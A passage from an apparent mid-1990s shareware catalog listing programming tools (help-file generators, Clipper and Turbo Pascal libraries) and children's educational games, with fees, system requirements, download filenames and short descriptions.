support; 3-month return + policy; royalty-free runtime license; site license; all ASP- + wide offers (see page 6). 3-month free upgrading allowed. + Look for: SLIB10.ZIP on BBSs; SLIB10.ZIP on CompuServe in + CIS:MSBASIC forum LIBrary 17 (or contact userID 75350,205 for + assistance). + SWREG#: 5263 + Download size: 620k (about 46 minutes with a 2400 baud modem) + Description: + A Windows utility to store excerpts of source code in a + database for easy retrieval. Code may be copied to the + clipboard, printed or edited. A search function is also + provided. Fully functional. + + Chapter 12, "Computer programming" 419 + + + + 12.8.2 `Help' utilities + + Product: DeskTop Advisor(R) + Create/browse popup hypertext w/images, sound. See full + description on page 407. + + Product: Helpgen + Author: Rimrock Software, 208-772-9347 + Version: 1.20 (09-06-94) + Needs: IBM 80386, Windows 3.1 or better. 150k RAM. + Strongly recommended: VGA monitor; Mouse. + Registration fee: $30.00 + Registration benefits: Full program functionality; printed + manual; 31/2" master disk(s); 3 months of unlimited CompuServe, + mail support; all ASP-wide offers (see page 6); discounts on + upgrades. + Look for: availability unknown on BBSs; HPGN12.ZIP on CompuServe + in CIS:PCPROG forum LIBrary 6 (or contact userID 71211,70 for + assistance). + SWREG#: 3462 + Download size: 198k (about 15 minutes with a 2400 baud modem) + Description: + Create attractive Windows help files for your programs without + using an expensive word processor. Uses an easy-to-learn macro + language to take the pain out of creating your help files. + Includes full RTF language support through the macro language + and/or RTF commands. Makes it easy to create and test help + files. A help file tutorial is also included. + + + Product: WhizNotes + A text organizer & help generator for Windows. See full + description on page 183. + + + 12.9 Software tools & add-ins + + See also: Database applications, Software tools & add-ins. + + 12.9.1 For multiple programs + + Product: Content Label Rating + Software Rating System. See full description on page 641. + + Product: Neural Network VBX + Multilayer Neural Network VBX for VB and C/C+. See full + description on page 395. + + Product: SLIB10.ZIP + Source code librarian utility. See full description on + page 418. + + Chapter 12, "Computer programming" 420 + + + + Product: TextPad 16 + TextPad 1.30: 16-Bit Text Editor. See full description on + page 181. + + Product: TextPad 32 + TextPad 1.30: 32-Bit Text Editor. See full description on + page 181. + + 12.9.2 For other + + Product: Ahelp Clipper Help Library + Author: MicroFox Company (Jim Hass), 216-659-9489 + Version: 1.44 (01-01-96) + Needs: IBM PC, DOS 2.0 or better. 32k RAM. Clipper. + Strongly recommended: Hard disk; Mouse. + Registration fee: $95.00 (add $2.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited phone, fax, BBS, CompuServe, mail support; + 1-month limited return policy; royalty-free source code; LAN + license; site license; bonus utilities; all ASP-wide offers + (see page 6); disks of other shareware; discounts on other + products. 1-month free upgrading allowed. + Look for: AHP144.ZIP on BBSs (call 216-661-9065 to download it at + no charge); AHP144.ZIP on CompuServe in CIS:CLIPPER forum + LIBrary 9 (or contact userID 73057,3113 for assistance); + AHP144.ZIP on GEnie in CLIPPER forum LIBrary 0. + Download size: 150k (about eleven minutes with a 2400 baud modem) + Description: + Create fully index and context sensitive help screens. The + programmer can optionally let users add/update help text. Help + windows pop up when user presses help key for a specific topic + or users can search help topic index for information. + + + Product: MouseTools + Author: Arcanum Computing (Nels Anderson) + Version: 1.0 (09-13-89) + Needs: IBM PC, DOS 2.1 or better. Turbo Pascal. + Registration fee: $10.00 (add $2.00 for shipping to U.S. + addresses) (add $2.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime BBS, CompuServe, mail support; royalty-free source + code; + Look for: MOUSTL55.ZIP on BBSs (call 508-788-6951 to download it + at no charge). + Download size: 100k (about eight minutes with a 2400 baud modem) + Description: + Provides a set of mouse interface routines for Turbo Pascal + programmers. Included are low level routines for positioning + and moving mouse cursors as well as higher level routines for + selecting files, multiple choice questions, etc. + + Chapter 12, "Computer programming" 421 + + + + Product: Playground + Tool for building object models. See full description on + page 384. + + Product: Rosenthal WinLite + Shrink MS-Windows programs by compression. See full + description on page 38. + + Product: TURBO TPU TOOLKIT! + Author: LONE WOLF ENTERPRISES (John A. Jackson) + Version: 1.5 (03-01-94) + Needs: IBM AT (80286), DOS 3.3 or better. Program can run safely + on a system with no hard disk and only one floppy disk drive; + EGA monitor; math coprocessor. Turbo Pascal v5.5 or later. + Registration fee: $100.00 (add $5.00 for shipping to U.S. + addresses) (add $10.00 for shipping to Canadian addresses) (add + $10.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; 31/2" master disk(s); 6 + months of phone, CompuServe, mail support; 6-month limited + return policy; all ASP-wide offers (see page 6); discounts on + upgrades. 3-month free upgrading allowed. + Look for: availability unknown on BBSs; TTT1.ZIP on CompuServe in + CIS:LIBRARY forum LIBrary 0 (multiple files) (or contact userID + 73353,121 for assistance). + Download size: 45k (about four minutes with a 2400 baud modem) + Description: + A math library for Turbo Pascal programmers. Engineers and + scientists will get features like hyperbolics, inverse trig, + factorials, primes, matrix math, eigenvalues/vectors, nxn + determinants, matrix multiplication, matrix inversion and + multiple regression. Engineering unit conversions for force, + power, volume, heat, work, viscosity, mass/molar flux, heat- + transfer coefficients and much, much more! Comes with a manual + explaining all the functions. + + Chapter 13, "Education" 422 + + + + + + Chapter 13 + Education + + See also: Writing applications, Bibliography. + + + 13.1 Preschool + + Product: Animated Alphabet + Author: FLIX Productions + Version: 1.0 (04-12-90) + Needs: IBM PC, DOS 3.3 or better. 500k RAM; EGA monitor; Hard + disk. + Registration fee: $8.00 (add $1.00 for shipping outside U.S. or + Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of unlimited BBS, CompuServe, mail support; lifetime + return policy; bonus utilities; bonus graphics; all ASP-wide + offers (see page 6). Lifetime free upgrading allowed. 99 free + update disk(s) sent out. + Look for: ALPHA10.ZIP on BBSs (call 512-258-0571 to download it + at no charge); ALPHA1.ZIP on CompuServe in CIS:EDFORUM forum + LIBrary 2 (or contact userID 72740,1326 for assistance). + Download size: 452k (about 34 minutes with a 2400 baud modem) + Description: + When the child matches the correct letter of the alphabet to + the picture, the picture becomes animated in an amusing way. + Winner of Shareware Industry Award for "Best Educational + Software". + + + Product: Animated Bugs + Author: FLIX Productions + Version: 1.0 (09-07-94) + Needs: IBM PC, DOS 3.3 or better. 500k RAM; VGA monitor; Hard + disk. + Strongly recommended: sound card. + Registration fee: $12.00 (add $1.00 for shipping outside U.S. or + Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited BBS, CompuServe, mail support; lifetime + return policy; bonus graphics; all ASP-wide offers (see + page 6). Lifetime free upgrading allowed. + Look for: ABUGS10.ZIP on BBSs (call 512-258-0571 to download it + at no charge); ABUG1.ZIP on CompuServe in CIS:EDFORUM forum + LIBrary 2 (or contact userID 72740,1326 for assistance). + Download size: 1184k (about 88 minutes with a 2400 baud modem) + Description: + A board game for young children that is full of color (256 of + them), sound (effects and voice) and animation. Garden + backgrounds, mini-animtions, and full-screen animtions are + featured. Two players can play the game (one or both can be the + + Chapter 13, "Education" 423 + + + + PC). Movement is determined by a spinner that can be either + numbers, colors or shapes. From FLIX Productions, winner of + both the Shareware Industry Award and Ziff Davis Shareware + Award. + + + Product: Animated Shapes + Author: FLIX Productions + Version: 1.0 (09-25-90) + Needs: IBM PC, DOS 3.3 or better. 500k RAM; EGA monitor; Hard + disk. + Registration fee: $8.00 (add $1.00 for shipping outside U.S. or + Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited BBS, CompuServe, mail support; lifetime + return policy; bonus graphics; all ASP-wide offers (see + page 6). Lifetime free upgrading allowed. + Look for: SHAPES10.ZIP on BBSs (call 512-258-0571 to download it + at no charge); SHAPE1.ZIP on CompuServe in CIS:EDFORUM forum + LIBrary 2 (or contact userID 72740,1326 for assistance). + Download size: 267k (about 20 minutes with a 2400 baud modem) + Description: + Children learn shapes and colors with animation. When the + shapes and colors of a geometrical object are correctly + identified, the object is used to build a picture. Guessing + what the picture will be is part of the fun. Once the picture + is completed, it turns into a movie-like animation. Winner of + the Shareware Industry Award for "Best Educational Software". + + + Product: Card Flash + Card flash. See full description on page 440. + + Product: Color Fun + Author: Burnham Park Software, Inc., 312-922-6313 + Version: 1.0 (05-06-94) + Needs: IBM AT (80286), Windows 3.1 or better. 1024k RAM; EGA + monitor; Hard disk. + Strongly recommended: VGA monitor; sound card. + Registration fee: $12.00 (add $1.00 for shipping to Canadian + addresses) (add $3.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, BBS, CompuServe, + GEnie, mail support; all ASP-wide offers (see page 6); + discounts on other products; discounts on upgrades. Lifetime + free upgrading allowed. + Look for: COLFUN10.ZIP on BBSs (call 312-922-2839 to download it + at no charge); COLFU*.ZIP on CompuServe in ZNT:PBSHOM forum + LIBrary 1 (or contact userID 71532,3271 for assistance); + + Chapter 13, "Education" 424 + + + + COLFUN10.ZIP on GEnie in WINDOWS forum LIBrary 20 (or contact + userID XRG36978 for assistance). + Download size: 223k (about 17 minutes with a 2400 baud modem) + Description: + A Windows educational game for children of ages 2-8. Teaches + children the basic colors and how to use computers. On-line + help. + + + Product: Dino Match + Memory-building for ages 5-9. See full description on + page 431. + + Product: Dino Numbers + Arithmetic practice game for ages 7-12. See full description + on page 472. + + Product: Dino Trilogy + Collection of educational games - ages 5-12. See full + description on page 432. + + Product: Kidproof for Windows + Secure desktop for kids. See full description on page 111. + + Product: Mouse Math + A whimsical verbal math drill program. See full description on + page 459. + + Product: Penny Penguin's Math Bingo + Learn math facts while playing bingo. See full description on + page 460. + + Product: Penny Penguin's Math Bingo <95> + Learn math facts while playing bingo. See full description on + page 460. + + Product: Roxie's ABC Fish + Learn ABCs and numbers while playing Go Fish. See full + description on page 461. + + Product: Roxie's ABC Fish + Learn ABCs and numbers while playing Go Fish. See full + description on page 462. + + Product: Roxie's Math Fish + Learn math while playing "Go Fish" See full description on + page 462. + + Product: Roxie's Math Fish + Learn math while playing "Go Fish" See full description on + page 463. + + Chapter 13, "Education" 425 + + + + Product: Roxie's Reading Fish + Learn to read while playing "Go Fish" See full description on + page 463. + + Product: Roxie's Reading Fish + Learn to read while playing "Go Fish" See full description on + page 464. + + Product: Teach Your Children + Helps kids have fun learning math and reading. See full + description on page 437. + + Product: Wonder Word + Animated spelling game with Zipper the monkey. See full + description on page 437. + + Product: Z & Z Color + Author: Z & Z Software + Version: 3.2 (03-15-96) + Needs: IBM 80386, Windows 3.1 or better. 4000k RAM; VGA monitor; + Hard disk; Mouse. + Strongly recommended: SVGA monitor; HP DeskJet printer. + Registration fee: $15.00 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; 31/2" master + disk(s); 3 months of unlimited CompuServe, mail support; bonus + data; all ASP-wide offers (see page 6); discounts on upgrades. + Look for: availability unknown on BBSs; ZZCOLR.ZIP on CompuServe + in CIS:WINFUN forum LIBrary 0 (or contact userID 76021,2256 for + assistance). + SWREG#: 1406 + PsL#: 11741 + Download size: 3000k (about 223 minutes with a 2400 baud modem) + Description: + A color-by-number MS Windows program great for ages 3 and + above. Teaches colors, numbers, letters, shapes, and memory + skills while entertaining again and again. Color on one of the + included pictures or create your own. Prize is awarded upon + successful completion of each drawing. Windows compatible sound + board is recommended but not required. + + Chapter 13, "Education" 426 + + + + Product: Z & Z Puzzle + Author: Z & Z Software + Version: 1.1 (03-15-96) + Needs: IBM 80386, Windows 3.1 or better. 4000k RAM; VGA monitor; + Hard disk; Mouse. + Registration fee: $15.00 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; 31/2" master + disk(s); 3 months of unlimited mail support; bonus data; all + ASP-wide offers (see page 6); discounts on other products; + discounts on upgrades. + Look for: availability unknown on BBSs; ZZPUZZ.ZIP on CompuServe + in CIS:WINFUN forum LIBrary 0 (or contact userID 76021,2256 for + assistance). + SWREG#: 7251 + PsL#: 14173 + Download size: 2000k (about 149 minutes with a 2400 baud modem) + Description: + An MS Windows combination slider and jigsaw puzzle for ages 4 + and above. Helps to improve problem solving skills. Contains + many options including the unique twist of having the pieces + colored in only when they are in their correct locations. Prize + is awarded upon successful completion of each puzzle. Windows + compatible sound card recommended but not required. + + + 13.2 Elementary + + Product: Anim. Multiplication & Division + Author: FLIX Productions + Version: 3.0 (05-12-94) + Needs: IBM PC, DOS 3.3 or better. 500k RAM; EGA monitor; Hard + disk. + Registration fee: $10.00 (add $1.00 for shipping outside U.S. or + Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited BBS, CompuServe, mail support; lifetime + return policy; bonus graphics; all ASP-wide offers (see + page 6). Lifetime free upgrading allowed. + Look for: AMD30.ZIP on BBSs (call 512-258-0571 to download it at + no charge); AMD30.ZIP on CompuServe in CIS:EDFORUM forum + LIBrary 2 (or contact userID 72740,1326 for assistance). + Download size: 524k (about 39 minutes with a 2400 baud modem) + Description: + st rd + Primarily for children from 1 through 3 grades. Based on + the multiplication tables from 1 to 10, it teaches "mental + math" in a fun way. Progressive help is given as needed. + Rewards for successful completion of ten problems include + several build-and-color you own animations (dinosaurs, cars, + face, and fashion model). From FLIX Productions - the winner of + both the Shareware Industry Award and Ziff Davis Shareware + award. + + Chapter 13, "Education" 427 + + + + Product: Animated Clock + Author: FLIX Productions + Version: 3.0 (05-12-94) + Needs: IBM PC, DOS 3.3 or better. 500k RAM; EGA monitor; Hard + disk. + Registration fee: $8.00 (add $1.00 for shipping outside U.S. or + Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited BBS, CompuServe, mail support; lifetime + return policy; bonus graphics; all ASP-wide offers (see + page 6). Lifetime free upgrading allowed. + Look for: ACLOCK30.ZIP on BBSs (call 512-258-0571 to download it + at no charge); ACLOC3.ZIP on CompuServe in CIS:EDFORUM forum + LIBrary 2 (or contact userID 72740,1326 for assistance). + Download size: 321k (about 24 minutes with a 2400 baud modem) + Description: + A program for children from pre-K through third grade that + teaches important time skills involving analog and digital + clocks. Various levels and context sensitive help are provided. + Animated rewards pop out of the doors of the cuckoo clock, and + ten correct answers gets a full-screen silly cartoon. Winner of + the Shareware Industry Award for "Best Educational Software". + + + Product: Animated Math + Author: FLIX Productions + Version: 1.0 (02-15-91) + Needs: IBM PC, DOS 3.3 or better. 500k RAM; EGA monitor; Hard + disk. + Registration fee: $10.00 (add $1.00 for shipping outside U.S. or + Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited BBS, CompuServe, mail support; lifetime + return policy; bonus graphics; all ASP-wide offers (see + page 6). Lifetime free upgrading allowed. + Look for: AMATH10.ZIP on BBSs (call 512-258-0571 to download it + at no charge); AMATH1.ZIP on CompuServe in CIS:EDFORUM forum + LIBrary 2 (or contact userID 72740,1326 for assistance). + Download size: 306k (about 23 minutes with a 2400 baud modem) + Description: + Teaches counting, addition and subtraction using animation. For + children from Pre-K through first grade. Single digit problems + covered. Animated rewards are given each step of the way - not + just a "wrong" response from the computer. Rewards include + dinosaur connect-the-dots, color games, build your own rocket, + and animated piano, and more. Winner of the Shareware Industry + Award for "Best Educational Software". + + Chapter 13, "Education" 428 + + + + Product: Animated Memory Game + Author: FLIX Productions + Version: 3.0 (05-12-94) + Needs: IBM PC, DOS 3.3 or better. 500k RAM; EGA monitor; Hard + disk. + Registration fee: $6.00 (add $1.00 for shipping outside U.S. or + Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited BBS, CompuServe, mail support; lifetime + return policy; bonus graphics; all ASP-wide offers (see + page 6). Lifetime free upgrading allowed. + Look for: AMEM30.ZIP on BBSs (call 512-258-0571 to download it at + no charge); AMEM3.ZIP on CompuServe in CIS:EDFORUM forum + LIBrary 2 (or contact userID 72740,1326 for assistance). + Download size: 237k (about 18 minutes with a 2400 baud modem) + Description: + Uses 30 animated sequences to test memory skills. By matching + hidden pictures in pairs you win the game and get animated + rewards. Many options are provided: selecting from 14 different + tile backgrounds, a mini-movie theater, and more. Various + difficulty levels provide challenges for all ages. Winner of + the Shareware Industry Award for "Best Educational Software". + + + Product: Animated Money + Author: FLIX Productions + Version: 1.0 (05-12-94) + Needs: IBM PC, DOS 3.3 or better. 500k RAM; VGA monitor; Hard + disk. + Strongly recommended: sound card. + Registration fee: $15.00 (add $1.00 for shipping outside U.S. or + Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited BBS, CompuServe, mail support; lifetime + return policy; bonus graphics; all ASP-wide offers (see + page 6). Lifetime free upgrading allowed. + Look for: AMON1?.ZIP on BBSs (call 512-258-0571 to download it at + no charge); AMON1*.ZIP on CompuServe in CIS:EDFORUM forum + LIBrary 2 (or contact userID 72740,1326 for assistance). + Download size: 1376k (about 102 minutes with a 2400 baud modem) + Description: + Teaches coin recognition and math skills using US and Canadian + coins. The coins are scanned to be highly recognizable. Three + types of games are provided: coin recognition and adjustable + level matching games (coins to amounts and coins to coins). 10 + matches earn a ticket to a movie featuring stop-motion + animation. Sound effects and speech supported for virtually all + devices. From FLIX Productions, winner of both the Shareware + Industry Award and Ziff Davis Shareware Award. + + Chapter 13, "Education" 429 + + + + Product: Animated VGA Memory Game + Author: FLIX Productions + Version: 1.0 (05-12-94) + Needs: IBM PC, DOS 3.3 or better. 500k RAM. + Strongly recommended: SVGA monitor; Hard disk; sound card. + Registration fee: $10.00 (add $1.00 for shipping outside U.S. or + Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited BBS, CompuServe, mail support; lifetime + return policy; bonus graphics; all ASP-wide offers (see + page 6). Lifetime free upgrading allowed. + Look for: AMEMV10.ZIP on BBSs (call 512-258-0571 to download it + at no charge); AMV1.ZIP on CompuServe in CIS:EDFORUM forum + LIBrary 2 (or contact userID 72740,1326 for assistance). + Download size: 752k (about 56 minutes with a 2400 baud modem) + Description: + SVGA and sound support are provided in this version of a + concentration type game. All kinds of animation are used + including: clay, stop-motion, morphing, tweening, 3D, cell and + full-motion video. up to 640 tiles can be used in SVGA mode (10 + to 20 in VGA). One or two player mode, and a welath of other + options. Winner of Ziff Davis Shareware Award from Computer + Gaming Magazine for "Best Puzzle Game". + + + Product: Animated Words + Author: FLIX Productions + Version: 3.0 (05-12-94) + Needs: IBM PC, DOS 3.3 or better. 500k RAM; EGA monitor; Hard + disk. + Strongly recommended: sound card. + Registration fee: $12.00 (add $1.00 for shipping outside U.S. or + Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited BBS, CompuServe, mail support; lifetime + return policy; bonus graphics; all ASP-wide offers (see + page 6). Lifetime free upgrading allowed. + Look for: AWORDS30.ZIP on BBSs (call 512-258-0571 to download it + at no charge); AWORD3.ZIP on CompuServe in CIS:EDFORUM forum + LIBrary 2 (or contact userID 72740,1326 for assistance). + Download size: 680k (about 51 minutes with a 2400 baud modem) + Description: + Animated Words is a spelling program for children from pre-K + through first grade. The child is helped to match the word with + it's picture. When the word is correctly matched, pieces are + added to a puzzle; after five correct answers the puzzle + becomes animated. The program is enhanced with digitized speech + for the PC Speaker or SoundBlaster. Winner of the Shareware + Industry Award for "Best Educational Software". + + + Product: Card Flash + Card flash. See full description on page 440. + + Chapter 13, "Education" 430 + + + + Product: Color Fun + Kids' game. See full description on page 423. + + Product: CULTURAL AWARENESS + Author: Awareness Productions (Thomas Yee), 214-517-0279 + Version: 1.13 (05-04-94) + Needs: IBM PC, DOS 3.0 or better. 256k RAM; Hard disk. + Registration fee: $20.00 (add $1.00 for shipping outside U.S. or + Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of unlimited mail support; 1-month return policy; bonus + data; all ASP-wide offers (see page 6); disks of other + shareware. + Look for: AWARE113.ZIP on BBSs (call 214-690-2168 to download it + at no charge). + Download size: 182k (about 14 minutes with a 2400 baud modem) + Description: + Educational game to test and improve your child's "cultural + literacy." Two levels of play. At Novice level, the game is + suitable for students sixth grade and up. At advanced level, + the game is a challenge for adults! Topics include proverbs, + idioms, grammar, children's literature, mythology, music, art, + philosophy, the Bible, world religions, American history & + geography, world history & geography, science & technology, + medicine, and mathematics. + + + Product: Dino Match + Author: DynoTech Software (David Carlson), 573-774-5001 + Version: 4.0 (01-09-96) + Needs: IBM 80386, Windows 3.1 or better. 4000k RAM; VGA monitor; + Hard disk; Mouse; VBRUN300.DLL. + Strongly recommended: sound card. + Registration fee: $20.00 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; 31/2" master + disk(s); lifetime unlimited phone, fax, BBS, CompuServe, + newsletter, mail support; 1-month limited return policy; bonus + data; bonus graphics; bonus game levels; all ASP-wide offers + (see page 6); disks of other shareware; discounts on upgrades; + registration commissions. + Look for: DMATCH40.ZIP on BBSs (call 573-774-5907 to download it + at no charge); DMATCH.ZIP on CompuServe in CIS:WINFUN forum + LIBrary 0 (or contact userID 71373,572 for assistance). + SWREG#: 6261 + Download size: 583k (about 44 minutes with a 2400 baud modem) + Description: + Memory-building windows game for ages 5-9. Game includes + animation, music, and sound effects. The loveable Derik the + Dinosaur continually thwarts the shenanigans of Rex the + Tyrannosaurus. The object of the game is to collect books. To + rescue books from Rex the Tyrannosaurus, Derik the Dinosaur + must solve various memory tasks. Each level is completed when a + + Chapter 13, "Education" 431 + + + + player collects all books on that level. Each level includes + bonus items for earning more points. "Can't loose" feature + encourages learning. + + + Product: Dino Spell + Author: DynoTech Software (David Carlson), 573-774-5001 + Version: 4.0 (01-09-96) + Needs: IBM 80386, Windows 3.1 or better. 4000k RAM; VGA monitor; + Hard disk; Mouse; VBRUN300.DLL. + Strongly recommended: sound card. + Registration fee: $20.00 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; 31/2" master + disk(s); lifetime unlimited phone, fax, BBS, CompuServe, + newsletter, mail support; 1-month limited return policy; bonus + data; bonus graphics; bonus game levels; all ASP-wide offers + (see page 6); disks of other shareware; discounts on upgrades; + registration commissions. + Look for: DSPELL40.ZIP on BBSs (call 573-774-5907 to download it + at no charge); DSPELL.ZIP on CompuServe in CIS:WINFUN forum + LIBrary 0 (or contact userID 71373,572 for assistance). + SWREG#: 6261 + Download size: 961k (about 72 minutes with a 2400 baud modem) + Description: + Spelling practice windows game for ages 7-12. Game includes + animation, music, and sound effects. The loveable Derik the + Dinosaur continually thwarts the shenanigans of Rex the + Tyrannosaurus. The object of the game is to collect apples. To + rescue apples from Rex the Tyrannosaurus, Derik the Dinosaur + must solve various spelling challenges. Level completed when a + player collects all apples on that level. Each level includes + bonus items for earning more points. "Can't loose" feature + encourages learning. + + + Product: Dino Trilogy + Author: DynoTech Software (David Carlson), 573-774-5001 + Version: 4.0 (01-09-96) + Needs: IBM 80386, Windows 3.1 or better. 4000k RAM; VGA monitor; + Hard disk; Mouse; VBRUN300.DLL. + Strongly recommended: sound card. + Registration fee: $30.00 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; 31/2" master + disk(s); lifetime unlimited phone, fax, BBS, CompuServe, + newsletter, mail support; 1-month limited return policy; bonus + data; bonus graphics; bonus game levels; all ASP-wide offers + + Chapter 13, "Education" 432 + + + + (see page 6); disks of other shareware; discounts on upgrades; + registration commissions. + Look for: DMATCH40.ZIP on BBSs (call 573-774-5907 to download it + at no charge); DMATCH.ZIP on CompuServe in CIS:WINFUN forum + LIBrary 0 (or contact userID 71373,572 for assistance). + SWREG#: 6261 + Download size: 583k (about 44 minutes with a 2400 baud modem) + Description: + Collection of three educational games for children ages 5-12. + Includes Dino Match (memory), Dino Numbers (math), and Dino + Spell (spelling). All games include animation, sound, and music + (with optional sound card). Registered edition of Dino Spell + includes separate Word List Manager for adding custom spelling + words. All games certified by National Standards Testing Lab + (NSTL) as "Ready for OS/2 Warp." + + + Product: DOC DEFIANT + An original board game similar to Backgammon. See full + description on page 608. + + Product: Equatron + Beat the computer at solving the equation. See full + description on page 599. + + Product: Kidproof for Windows + Secure desktop for kids. See full description on page 111. + + Product: Know It All + Author: Software Avenue, Inc. (Gregory Lee), 602-813-0876 + Version: 1.0 (11-11-95) + Needs: IBM PC, DOS 3.3 or better. 640k RAM; Hard disk; Mouse. + Strongly recommended: VGA monitor; XMS memory; sound card. + Registration fee: $29.95 (add $4.00 for shipping to U.S. + addresses) (add $10.00 for shipping to Canadian addresses) (add + $10.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); 3 months of unlimited CompuServe, mail + support; 3-month return policy; bonus data; bonus graphics; all + ASP-wide offers (see page 6); disks of other shareware. + Personalized 'Official Certificate of Brainiology'. + Look for: KNOWIT.ZIP on BBSs; KNOWIT.ZIP on CompuServe in + CIS:EDUCATION forum LIBrary 0 (or contact userID 76455,3236 for + assistance); KNOWIT.ZIP on GEnie in 0 forum LIBrary 0. + Download size: 585k (about 44 minutes with a 2400 baud modem) + Description: + The incredible, expandable learning game. Full color graphics, + digitized sound effects, and a full MIDI soundtrack make + learning fun and interesting. Comes with the first topic + 'Geography', two additional topics 'Biology' and 'US History' + come with the registered product. An intuitive user interface + and full online documentation make this product easy to install + and use. + + Chapter 13, "Education" 433 + + + + Product: MATH CHALLENGE + Author: Just For Me Software, Inc., 810-348-6697 + Version: 2.0 (03-01-94) + Needs: IBM PC, DOS 3.0 or better. Program can run safely on a + system with no hard disk and only one floppy disk drive; VGA + monitor. + Strongly recommended: Hard disk; Mouse. + Registration fee: $16.95 + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, CompuServe, mail + support; lifetime return policy; all ASP-wide offers (see + page 6); disks of other shareware. + Look for: availability unknown on BBSs; MATHCH.EXE on CompuServe + in CIS:EDFORUM forum LIBrary 2 (or contact userID 71150,1305 + for assistance). + SWREG#: 1988 + Download size: 350k (about 26 minutes with a 2400 baud modem) + Description: + An educational game that encourages your children to learn + their math tables with personalized text, colorful animation, + interesting sound effects, and photographic images. Also + provides parent with options to select subject and difficulty + levels. Can be used in practice/learning or in timed testing + modes. + + + Product: MathCounts 1+2 + Author: Able Art Software (Al Walters), 604-229-4766 + Version: 1.2 (01-07-94) + Needs: IBM PC, DOS 3.0 or better. 512k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; EGA monitor; Hercules monitor. + Registration fee: $29.95 (add $3.00 for shipping outside U.S. or + Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of phone, mail support; discounts on + other products. + Look for: MC12V12.ZIP on BBSs (multiple files); MC1212.ZIP on + CompuServe in CIS:PCAPP forum LIBrary 11 (or contact userID + 71431,1673 for assistance). + SWREG#: 819 + Download size: 90k (about seven minutes with a 2400 baud modem) + Description: + st nd + A graphics-based 1 and 2 grade math tutorial, covers + counting, addition, subtraction, multiplication, fractions, + telling time, word problems, place value, and more. Instructive + feedback and positive reinforcement. Difficulty levels chosen + automatically or by instructor. Keeps track of student's + progress. Can be customized with friends' names in word + problems. + + Chapter 13, "Education" 434 + + + + Product: MathCounts 3+4 + Author: Able Art Software (Al Walters), 604-229-4766 + Version: 1.2 (01-07-94) + Needs: IBM PC, DOS 3.0 or better. 512k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; EGA monitor; Hercules monitor. + Registration fee: $29.95 (add $3.00 for shipping outside U.S. or + Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of phone, mail support; discounts on + other products. + Look for: MC34V12.ZIP on BBSs (multiple files); MC3412.ZIP on + CompuServe in CIS:PCAPP forum LIBrary 11 (or contact userID + 71431,1673 for assistance). + SWREG#: 820 + Download size: 115k (about nine minutes with a 2400 baud modem) + Description: + rd th + A graphics-based 3 and 4 grade math tutorial, covers + addition, subtraction, multiplication, division, estimation, + fractions, decimals, word problems, and more! Instructive + feedback and positive reinforcement. Context-sensitive remedial + work, automatic beginner's mode. Keeps track of student's + progress. Can be customized. + + + Product: MERLIN'S MATH + Author: Awareness Productions (Thomas Yee), 214-517-0279 + Version: 1.03 (05-04-94) + Needs: IBM AT (80286), DOS 3.0 or better. 512k RAM; VGA monitor; + Mouse. + Registration fee: $18.00 (add $1.00 for shipping outside U.S. or + Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of unlimited mail support; 1-month return policy; all + ASP-wide offers (see page 6); disks of other shareware. + Look for: MERLN103.ZIP on BBSs (call 214-690-2168 to download it + at no charge). + Download size: 175k (about 13 minutes with a 2400 baud modem) + Description: + Episodes 1 & 2 teach the mechanics of multiplying multiple + digit numbers, up to 5 by 5 digits, and long division. Starting + as an apprentice magician, the student gains in power by + solving math problems of increasing difficulty, all the time + racing against a dripping water clock. Points are awarded on + the basis of speed, accuracy, and difficulty level of problem. + + + Product: Mouse Math + A whimsical verbal math drill program. See full description on + page 459. + + Chapter 13, "Education" 435 + + + + Product: A MUSICAL TUTORIAL + An excellent way to promote musical study. See full + description on page 473. + + Product: A MUSICAL TUTORIAL for Windows + An excellent way to promote musical study. See full + description on page 473. + + Product: Penny Penguin's Math Bingo + Learn math facts while playing bingo. See full description on + page 460. + + Product: Penny Penguin's Math Bingo <95> + Learn math facts while playing bingo. See full description on + page 460. + + Product: Roxie's ABC Fish + Learn ABCs and numbers while playing Go Fish. See full + description on page 461. + + Product: Roxie's ABC Fish + Learn ABCs and numbers while playing 